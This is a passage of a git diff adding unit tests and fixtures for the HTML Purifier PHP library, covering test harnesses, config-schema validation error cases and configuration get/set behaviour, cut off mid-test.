b/lib/htmlpurifier/tests/HTMLPurifier/ChildDefHarness.php @@ -0,0 +1,16 @@ +<?php + +class HTMLPurifier_ChildDefHarness extends HTMLPurifier_ComplexHarness +{ + + public function setUp() { + parent::setUp(); + $this->obj = null; + $this->func = 'validateChildren'; + $this->to_tokens = true; + $this->to_html = true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ComplexHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/ComplexHarness.php new file mode 100644 index 000000000..8e806c63c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ComplexHarness.php @@ -0,0 +1,106 @@ +<?php + +/** + * General-purpose test-harness that makes testing functions that require + * configuration and context objects easier when those two parameters are + * meaningless. See HTMLPurifier_ChildDefTest for a good example of usage. + */ +class HTMLPurifier_ComplexHarness extends HTMLPurifier_Harness +{ + + /** + * Instance of the object that will execute the method + */ + protected $obj; + + /** + * Name of the function to be executed + */ + protected $func; + + /** + * Whether or not the method deals in tokens. If set to true, assertResult() + * will transparently convert HTML to and back from tokens. + */ + protected $to_tokens = false; + + /** + * Whether or not to convert tokens back into HTML before performing + * equality check, has no effect on bools. + */ + protected $to_html = false; + + /** + * Instance of an HTMLPurifier_Lexer implementation. + */ + protected $lexer; + + public function __construct() { + $this->lexer = new HTMLPurifier_Lexer_DirectLex(); + parent::__construct(); + } + + /** + * Asserts a specific result from a one parameter + config/context function + * @param $input Input parameter + * @param $expect Expectation + * @param $config Configuration array in form of Ns.Directive => Value. + * Has no effect if $this->config is set. + * @param $context_array Context array in form of Key => Value or an actual + * context object. + */ + protected function assertResult($input, $expect = true) { + + if ($this->to_tokens && is_string($input)) { + // $func may cause $input to change, so "clone" another copy + // to sacrifice + $input = $this->tokenize($temp = $input); + $input_c = $this->tokenize($temp); + } else { + $input_c = $input; + } + + // call the function + $func = $this->func; + $result = $this->obj->$func($input_c, $this->config, $this->context); + + // test a bool result + if (is_bool($result)) { + $this->assertIdentical($expect, $result); + return; + } elseif (is_bool($expect)) { + $expect = $input; + } + + if ($this->to_html) { + $result = $this->generate($result); + if (is_array($expect)) { + $expect = $this->generate($expect); + } + } + $this->assertIdentical($expect, $result); + + if ($expect !== $result) { + echo '<pre>' . var_dump($result) . '</pre>'; + } + + } + + /** + * Tokenize HTML into tokens, uses member variables for common variables + */ + protected function tokenize($html) { + return $this->lexer->tokenizeHTML($html, $this->config, $this->context); + } + + /** + * Generate textual HTML from tokens + */ + protected function generate($tokens) { + $generator = new HTMLPurifier_Generator($this->config, $this->context); + return $generator->generateFromTokens($tokens); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/InterchangeTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/InterchangeTest.php new file mode 100644 index 000000000..0d539ea2c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/InterchangeTest.php @@ -0,0 +1,21 @@ +<?php + +class HTMLPurifier_ConfigSchema_InterchangeTest extends UnitTestCase +{ + + protected $interchange; + + public function setup() { + $this->interchange = new HTMLPurifier_ConfigSchema_Interchange(); + } + + function testAddDirective() { + $v = new HTMLPurifier_ConfigSchema_Interchange_Directive(); + $v->id = new HTMLPurifier_ConfigSchema_Interchange_Id('Namespace.Directive'); + $this->interchange->addDirective($v); + $this->assertIdentical($v, $this->interchange->directives['Namespace.Directive']); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/aliasesAliasCollision.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/aliasesAliasCollision.vtest new file mode 100644 index 000000000..ed3857c40 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/aliasesAliasCollision.vtest @@ -0,0 +1,13 @@ +ERROR: Alias 'Ns.BothWantThisName' in aliases in directive 'Ns.Dir2' collides with alias for directive 'Ns.Dir' +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: int +DEFAULT: 3 +ALIASES: Ns.BothWantThisName +---- +Ns.Dir2 +DESCRIPTION: Directive +TYPE: string +DEFAULT: 'a' +ALIASES: Ns.BothWantThisName diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/aliasesDirectiveCollision.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/aliasesDirectiveCollision.vtest new file mode 100644 index 000000000..582a481a4 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/aliasesDirectiveCollision.vtest @@ -0,0 +1,12 @@ +ERROR: Alias 'Ns.Innocent' in aliases in directive 'Ns.Dir' collides with another directive +---- +Ns.Innocent +DESCRIPTION: Innocent directive +TYPE: int +DEFAULT: 3 +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: string +DEFAULT: 'a' +ALIASES: Ns.Innocent diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/allowedIsString.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/allowedIsString.vtest new file mode 100644 index 000000000..9ecc5f930 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/allowedIsString.vtest @@ -0,0 +1,7 @@ +ERROR: Value 3 in allowed in directive 'Ns.Dir' must be a string +---- +ID: Ns.Dir +TYPE: string +DESCRIPTION: Description +DEFAULT: 'asdf' +ALLOWED: 'asdf', 3 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/allowedNotEmpty.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/allowedNotEmpty.vtest new file mode 100644 index 000000000..1e08fab0d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/allowedNotEmpty.vtest @@ -0,0 +1,7 @@ +ERROR: Allowed in directive 'Ns.Dir' must not be empty +---- +ID: Ns.Dir +TYPE: string +DESCRIPTION: Description +DEFAULT: 'asdf' +ALLOWED: diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultIsAllowed.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultIsAllowed.vtest new file mode 100644 index 000000000..ef1944707 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultIsAllowed.vtest @@ -0,0 +1,7 @@ +ERROR: Default in directive 'Ns.Dir' must be an allowed value +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: string +DEFAULT: 'a' +ALLOWED: 'b' diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultNullWithAllowed.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultNullWithAllowed.vtest new file mode 100644 index 000000000..7ba3c85c0 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultNullWithAllowed.vtest @@ -0,0 +1,5 @@ +Ns.Dir +DESCRIPTION: Directive +TYPE: string/null +DEFAULT: null +ALLOWED: 'a' diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultType.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultType.vtest new file mode 100644 index 000000000..79ea043ac --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/defaultType.vtest @@ -0,0 +1,6 @@ +ERROR: Expected type string, got integer in DEFAULT in directive hash 'Ns.Dir' +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: string +DEFAULT: 0 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/descriptionNotEmpty.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/descriptionNotEmpty.vtest new file mode 100644 index 000000000..d09ddc77b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/descriptionNotEmpty.vtest @@ -0,0 +1,5 @@ +ERROR: Description in directive 'Ns.Dir' must not be empty +---- +Ns.Dir +TYPE: int +DEFAULT: 0 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/ignoreNamespace.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/ignoreNamespace.vtest new file mode 100644 index 000000000..3fc28d3a4 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/ignoreNamespace.vtest @@ -0,0 +1,3 @@ +Ns +DESCRIPTION: Namespace + diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeDefined.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeDefined.vtest new file mode 100644 index 000000000..4bb8abeb2 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeDefined.vtest @@ -0,0 +1,5 @@ +ERROR: TYPE in directive hash 'Ns.Dir' not defined +---- +Ns.Dir +DESCRIPTION: Notice that TYPE is missing +DEFAULT: 0 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeExists.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeExists.vtest new file mode 100644 index 000000000..f9851f536 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeExists.vtest @@ -0,0 +1,6 @@ +ERROR: Invalid type 'foobar' in DEFAULT in directive hash 'Ns.Dir' +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: foobar +DEFAULT: 0 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeWithAllowedIsStringType.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeWithAllowedIsStringType.vtest new file mode 100644 index 000000000..bf4e2b21b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeWithAllowedIsStringType.vtest @@ -0,0 +1,7 @@ +ERROR: Type in directive 'Ns.Dir' must be a string type when used with allowed or value aliases +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: int +DEFAULT: 3 +ALLOWED: 1, 2, 3 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeWithValueAliasesIsStringType.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeWithValueAliasesIsStringType.vtest new file mode 100644 index 000000000..59cf4333a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/typeWithValueAliasesIsStringType.vtest @@ -0,0 +1,7 @@ +ERROR: Type in directive 'Ns.Dir' must be a string type when used with allowed or value aliases +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: int +DEFAULT: 3 +VALUE-ALIASES: 2 => 3 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/unique.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/unique.vtest new file mode 100644 index 000000000..c83649e8d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/unique.vtest @@ -0,0 +1,11 @@ +ERROR: Cannot redefine directive 'Ns.Dir' +---- +ID: Ns.Dir +DESCRIPTION: Version 1 +TYPE: int +DEFAULT: 0 +---- +ID: Ns.Dir +DESCRIPTION: Version 2 +TYPE: int +DEFAULT: 0 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesAliasIsString.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesAliasIsString.vtest new file mode 100644 index 000000000..b9f28eee1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesAliasIsString.vtest @@ -0,0 +1,7 @@ +ERROR: Alias 3 in valueAliases in directive 'Ns.Dir' must be a string +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: string +DEFAULT: 'a' +VALUE-ALIASES: 3 => 'a' diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesAliasNotAllowed.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesAliasNotAllowed.vtest new file mode 100644 index 000000000..ef9c14883 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesAliasNotAllowed.vtest @@ -0,0 +1,8 @@ +ERROR: Alias 'b' in valueAliases in directive 'Ns.Dir' must not be an allowed value +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: string +DEFAULT: 'a' +ALLOWED: 'a', 'b', 'c' +VALUE-ALIASES: 'b' => 'c' diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesNotAliasSelf.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesNotAliasSelf.vtest new file mode 100644 index 000000000..4c417fd5f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesNotAliasSelf.vtest @@ -0,0 +1,7 @@ +ERROR: Alias 'bar' in valueAliases in directive 'Ns.Dir' must not be an alias to itself +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: string +DEFAULT: 'foo' +VALUE-ALIASES: 'bar' => 'bar' diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesRealAllowed.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesRealAllowed.vtest new file mode 100644 index 000000000..89502d34a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesRealAllowed.vtest @@ -0,0 +1,8 @@ +ERROR: Alias 'c' in valueAliases in directive 'Ns.Dir' must be an alias to an allowed value +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: string +DEFAULT: 'a' +ALLOWED: 'a', 'b' +VALUE-ALIASES: 'c' => 'd' diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesRealIsString.vtest b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesRealIsString.vtest new file mode 100644 index 000000000..92ec197dc --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/Validator/directive/valueAliasesRealIsString.vtest @@ -0,0 +1,7 @@ +ERROR: Alias target 3 from alias 'b' in valueAliases in directive 'Ns.Dir' must be a string +---- +Ns.Dir +DESCRIPTION: Directive +TYPE: string +DEFAULT: 'a' +VALUE-ALIASES: 'b' => 3 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorAtomTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorAtomTest.php new file mode 100644 index 000000000..38625136e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorAtomTest.php @@ -0,0 +1,92 @@ +<?php + +class HTMLPurifier_ConfigSchema_ValidatorAtomTest extends UnitTestCase +{ + + protected function expectValidationException($msg) { + $this->expectException(new HTMLPurifier_ConfigSchema_Exception($msg)); + } + + protected function makeAtom($value) { + $obj = new stdClass(); + $obj->property = $value; + // Note that 'property' and 'context' are magic wildcard values + return new HTMLPurifier_ConfigSchema_ValidatorAtom('context', $obj, 'property'); + } + + function testAssertIsString() { + $this->makeAtom('foo')->assertIsString(); + } + + function testAssertIsStringFail() { + $this->expectValidationException("Property in context must be a string"); + $this->makeAtom(3)->assertIsString(); + } + + function testAssertNotNull() { + $this->makeAtom('foo')->assertNotNull(); + } + + function testAssertNotNullFail() { + $this->expectValidationException("Property in context must not be null"); + $this->makeAtom(null)->assertNotNull(); + } + + function testAssertAlnum() { + $this->makeAtom('foo2')->assertAlnum(); + } + + function testAssertAlnumFail() { + $this->expectValidationException("Property in context must be alphanumeric"); + $this->makeAtom('%a')->assertAlnum(); + } + + function testAssertAlnumFailIsString() { + $this->expectValidationException("Property in context must be a string"); + $this->makeAtom(3)->assertAlnum(); + } + + function testAssertNotEmpty() { + $this->makeAtom('foo')->assertNotEmpty(); + } + + function testAssertNotEmptyFail() { + $this->expectValidationException("Property in context must not be empty"); + $this->makeAtom('')->assertNotEmpty(); + } + + function testAssertIsBool() { + $this->makeAtom(false)->assertIsBool(); + } + + function testAssertIsBoolFail() { + $this->expectValidationException("Property in context must be a boolean"); + $this->makeAtom('0')->assertIsBool(); + } + + function testAssertIsArray() { + $this->makeAtom(array())->assertIsArray(); + } + + function testAssertIsArrayFail() { + $this->expectValidationException("Property in context must be an array"); + $this->makeAtom('asdf')->assertIsArray(); + } + + + function testAssertIsLookup() { + $this->makeAtom(array('foo' => true))->assertIsLookup(); + } + + function testAssertIsLookupFail() { + $this->expectValidationException("Property in context must be a lookup array"); + $this->makeAtom(array('foo' => 4))->assertIsLookup(); + } + + function testAssertIsLookupFailIsArray() { + $this->expectValidationException("Property in context must be an array"); + $this->makeAtom('asdf')->assertIsLookup(); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorTest.php new file mode 100644 index 000000000..9cbf36e2d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorTest.php @@ -0,0 +1,101 @@ +<?php + +/** + * Special test-case for cases that can't be tested using + * HTMLPurifier_ConfigSchema_ValidatorTestCase. + */ +class HTMLPurifier_ConfigSchema_ValidatorTest extends UnitTestCase +{ + public $validator, $interchange; + + public function setup() { + $this->validator = new HTMLPurifier_ConfigSchema_Validator(); + $this->interchange = new HTMLPurifier_ConfigSchema_Interchange(); + } + + function testDirectiveIntegrityViolation() { + $d = $this->makeDirective('Ns.Dir'); + $d->id = new HTMLPurifier_ConfigSchema_Interchange_Id('Ns.Dir2'); + $this->expectValidationException("Integrity violation: key 'Ns.Dir' does not match internal id 'Ns.Dir2'"); + $this->validator->validate($this->interchange); + } + + function testDirectiveTypeNotEmpty() { + $d = $this->makeDirective('Ns.Dir'); + $d->default = 0; + $d->description = 'Description'; + + $this->expectValidationException("Type in directive 'Ns.Dir' must not be empty"); + $this->validator->validate($this->interchange); + } + + function testDirectiveDefaultInvalid() { + $d = $this->makeDirective('Ns.Dir'); + $d->default = 'asdf'; + $d->type = 'int'; + $d->description = 'Description'; + + $this->expectValidationException("Default in directive 'Ns.Dir' had error: Expected type int, got string"); + $this->validator->validate($this->interchange); + } + + function testDirectiveIdIsString() { + $d = $this->makeDirective(3); + $d->default = 0; + $d->type = 'int'; + $d->description = 'Description'; + + $this->expectValidationException("Key in id '3' in directive '3' must be a string"); + $this->validator->validate($this->interchange); + } + + function testDirectiveTypeAllowsNullIsBool() { + $d = $this->makeDirective('Ns.Dir'); + $d->default = 0; + $d->type = 'int'; + $d->description = 'Description'; + $d->typeAllowsNull = 'yes'; + + $this->expectValidationException("TypeAllowsNull in directive 'Ns.Dir' must be a boolean"); + $this->validator->validate($this->interchange); + } + + function testDirectiveValueAliasesIsArray() { + $d = $this->makeDirective('Ns.Dir'); + $d->default = 'a'; + $d->type = 'string'; + $d->description = 'Description'; + $d->valueAliases = 2; + + $this->expectValidationException("ValueAliases in directive 'Ns.Dir' must be an array"); + $this->validator->validate($this->interchange); + } + + function testDirectiveAllowedIsLookup() { + $d = $this->makeDirective('Ns.Dir'); + $d->default = 'foo'; + $d->type = 'string'; + $d->description = 'Description'; + $d->allowed = array('foo' => 1); + + $this->expectValidationException("Allowed in directive 'Ns.Dir' must be a lookup array"); + $this->validator->validate($this->interchange); + } + + // helper functions + + + protected function makeDirective($key) { + $directive = new HTMLPurifier_ConfigSchema_Interchange_Directive(); + $directive->id = new HTMLPurifier_ConfigSchema_Interchange_Id($key); + $this->interchange->addDirective($directive); + return $directive; + } + + protected function expectValidationException($msg) { + $this->expectException(new HTMLPurifier_ConfigSchema_Exception($msg)); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorTestCase.php b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorTestCase.php new file mode 100644 index 000000000..87fa14d0d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchema/ValidatorTestCase.php @@ -0,0 +1,44 @@ +<?php + +/** + * Controller for validator test-cases. + */ +class HTMLPurifier_ConfigSchema_ValidatorTestCase extends UnitTestCase +{ + + protected $_path, $_parser, $_builder; + public $validator; + + public function __construct($path) { + $this->_path = $path; + $this->_parser = new HTMLPurifier_StringHashParser(); + $this->_builder = new HTMLPurifier_ConfigSchema_InterchangeBuilder(); + parent::__construct($path); + } + + public function setup() { + $this->validator = new HTMLPurifier_ConfigSchema_Validator(); + } + + function testValidator() { + $hashes = $this->_parser->parseMultiFile($this->_path); + $interchange = new HTMLPurifier_ConfigSchema_Interchange(); + $error = null; + foreach ($hashes as $hash) { + if (!isset($hash['ID'])) { + if (isset($hash['ERROR'])) { + $this->expectException( + new HTMLPurifier_ConfigSchema_Exception($hash['ERROR']) + ); + } + continue; + } + $this->_builder->build($interchange, new HTMLPurifier_StringHash($hash)); + } + $this->validator->validate($interchange); + $this->pass(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchemaTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchemaTest.php new file mode 100644 index 000000000..dc3bf99eb --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigSchemaTest.php @@ -0,0 +1,99 @@ +<?php + +class HTMLPurifier_ConfigSchemaTest extends HTMLPurifier_Harness +{ + + protected $schema; + + public function setup() { + $this->schema = new HTMLPurifier_ConfigSchema(); + } + + function test_define() { + $this->schema->add('Car.Seats', 5, 'int', false); + + $this->assertIdentical($this->schema->defaults['Car.Seats'], 5); + $this->assertIdentical($this->schema->info['Car.Seats']->type, HTMLPurifier_VarParser::INT); + + $this->schema->add('Car.Age', null, 'int', true); + + $this->assertIdentical($this->schema->defaults['Car.Age'], null); + $this->assertIdentical($this->schema->info['Car.Age']->type, HTMLPurifier_VarParser::INT); + + } + + function test_defineAllowedValues() { + $this->schema->add('QuantumNumber.Spin', 0.5, 'float', false); + $this->schema->add('QuantumNumber.Current', 's', 'string', false); + $this->schema->add('QuantumNumber.Difficulty', null, 'string', true); + + $this->schema->addAllowedValues( // okay, since default is null + 'QuantumNumber.Difficulty', array('easy' => true, 'medium' => true, 'hard' => true) + ); + + $this->assertIdentical($this->schema->defaults['QuantumNumber.Difficulty'], null); + $this->assertIdentical($this->schema->info['QuantumNumber.Difficulty']->type, HTMLPurifier_VarParser::STRING); + $this->assertIdentical($this->schema->info['QuantumNumber.Difficulty']->allow_null, true); + $this->assertIdentical($this->schema->info['QuantumNumber.Difficulty']->allowed, + array( + 'easy' => true, + 'medium' => true, + 'hard' => true + ) + ); + + } + + function test_defineValueAliases() { + $this->schema->add('Abbrev.HTH', 'Happy to Help', 'string', false); + $this->schema->addAllowedValues( + 'Abbrev.HTH', array( + 'Happy to Help' => true, + 'Hope that Helps' => true, + 'HAIL THE HAND!' => true, + ) + ); + $this->schema->addValueAliases( + 'Abbrev.HTH', array( + 'happy' => 'Happy to Help', + 'hope' => 'Hope that Helps' + ) + ); + $this->schema->addValueAliases( // delayed addition + 'Abbrev.HTH', array( + 'hail' => 'HAIL THE HAND!' + ) + ); + + $this->assertIdentical($this->schema->defaults['Abbrev.HTH'], 'Happy to Help'); + $this->assertIdentical($this->schema->info['Abbrev.HTH']->type, HTMLPurifier_VarParser::STRING); + $this->assertIdentical($this->schema->info['Abbrev.HTH']->allowed, + array( + 'Happy to Help' => true, + 'Hope that Helps' => true, + 'HAIL THE HAND!' => true + ) + ); + $this->assertIdentical($this->schema->info['Abbrev.HTH']->aliases, + array( + 'happy' => 'Happy to Help', + 'hope' => 'Hope that Helps', + 'hail' => 'HAIL THE HAND!' + ) + ); + + } + + function testAlias() { + $this->schema->add('Home.Rug', 3, 'int', false); + $this->schema->addAlias('Home.Carpet', 'Home.Rug'); + + $this->assertTrue(!isset($this->schema->defaults['Home.Carpet'])); + $this->assertIdentical($this->schema->info['Home.Carpet']->key, 'Home.Rug'); + $this->assertIdentical($this->schema->info['Home.Carpet']->isAlias, true); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-create.ini b/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-create.ini new file mode 100644 index 000000000..31412f99a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-create.ini @@ -0,0 +1,4 @@ +[Cake] +Sprinkles = 42 + +; vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-finalize.ini b/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-finalize.ini new file mode 100644 index 000000000..3ab185fad --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-finalize.ini @@ -0,0 +1,4 @@ +[Poem] +Meter = alexandrine + +; vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-loadIni.ini b/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-loadIni.ini new file mode 100644 index 000000000..cfa5a907f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest-loadIni.ini @@ -0,0 +1,6 @@ +[Shortcut] +Copy = q +Cut = t +Paste = p + +; vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest.php new file mode 100644 index 000000000..3d36fc057 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ConfigTest.php @@ -0,0 +1,557 @@ +<?php + +class HTMLPurifier_ConfigTest extends HTMLPurifier_Harness +{ + + protected $schema; + protected $oldFactory; + + public function setUp() { + // set up a dummy schema object for testing + $this->schema = new HTMLPurifier_ConfigSchema(); + } + + // test functionality based on ConfigSchema + + function testNormal() { + $this->schema->add('Element.Abbr', 'H', 'string', false); + $this->schema->add('Element.Name', 'hydrogen', 'istring', false); + $this->schema->add('Element.Number', 1, 'int', false); + $this->schema->add('Element.Mass', 1.00794, 'float', false); + $this->schema->add('Element.Radioactive', false, 'bool', false); + $this->schema->add('Element.Isotopes', array(1 => true, 2 => true, 3 => true), 'lookup', false); + $this->schema->add('Element.Traits', array('nonmetallic', 'odorless', 'flammable'), 'list', false); + $this->schema->add('Element.IsotopeNames', array(1 => 'protium', 2 => 'deuterium', 3 => 'tritium'), 'hash', false); + $this->schema->add('Element.Object', new stdClass(), 'mixed', false); + + $config = new HTMLPurifier_Config($this->schema); + $config->autoFinalize = false; + $config->chatty = false; + + // test default value retrieval + $this->assertIdentical($config->get('Element.Abbr'), 'H'); + $this->assertIdentical($config->get('Element.Name'), 'hydrogen'); + $this->assertIdentical($config->get('Element.Number'), 1); + $this->assertIdentical($config->get('Element.Mass'), 1.00794); + $this->assertIdentical($config->get('Element.Radioactive'), false); + $this->assertIdentical($config->get('Element.Isotopes'), array(1 => true, 2 => true, 3 => true)); + $this->assertIdentical($config->get('Element.Traits'), array('nonmetallic', 'odorless', 'flammable')); + $this->assertIdentical($config->get('Element.IsotopeNames'), array(1 => 'protium', 2 => 'deuterium', 3 => 'tritium')); + $this->assertIdentical($config->get('Element.Object'), new stdClass()); + + // test setting values + $config->set('Element.Abbr', 'Pu'); + $config->set('Element.Name', 'PLUTONIUM'); // test decaps + $config->set('Element.Number', '94'); // test parsing + $config->set('Element.Mass', '244.'); // test parsing + $config->set('Element.Radioactive', true); + $config->set('Element.Isotopes', array(238, 239)); // test inversion + $config->set('Element.Traits', 'nuclear, heavy, actinide'); // test parsing + $config->set('Element.IsotopeNames', array(238 => 'Plutonium-238', 239 => 'Plutonium-239')); + $config->set('Element.Object', false); // unmodeled + + $this->expectError('Cannot set undefined directive Element.Metal to value'); + $config->set('Element.Metal', true); + + $this->expectError('Value for Element.Radioactive is of invalid type, should be bool'); + $config->set('Element.Radioactive', 'very'); + + // test value retrieval + $this->assertIdentical($config->get('Element.Abbr'), 'Pu'); + $this->assertIdentical($config->get('Element.Name'), 'plutonium'); + $this->assertIdentical($config->get('Element.Number'), 94); + $this->assertIdentical($config->get('Element.Mass'), 244.); + $this->assertIdentical($config->get('Element.Radioactive'), true); + $this->assertIdentical($config->get('Element.Isotopes'), array(238 => true, 239 => true)); + $this->assertIdentical($config->get('Element.Traits'), array('nuclear', 'heavy', 'actinide')); + $this->assertIdentical($config->get('Element.IsotopeNames'), array(238 => 'Plutonium-238', 239 => 'Plutonium-239')); + $this->assertIdentical($config->get('Element.Object'), false); + + $this->expectError('Cannot retrieve value of undefined directive Element.Metal'); + $config->get('Element.Metal'); + + } + + function testEnumerated() { + + // case sensitive + $this->schema->add('Instrument.Manufacturer', 'Yamaha', 'string', false); + $this->schema->addAllowedValues('Instrument.Manufacturer', array( + 'Yamaha' => true, 'Conn-Selmer' => true, 'Vandoren' => true, + 'Laubin' => true, 'Buffet' => true, 'other' => 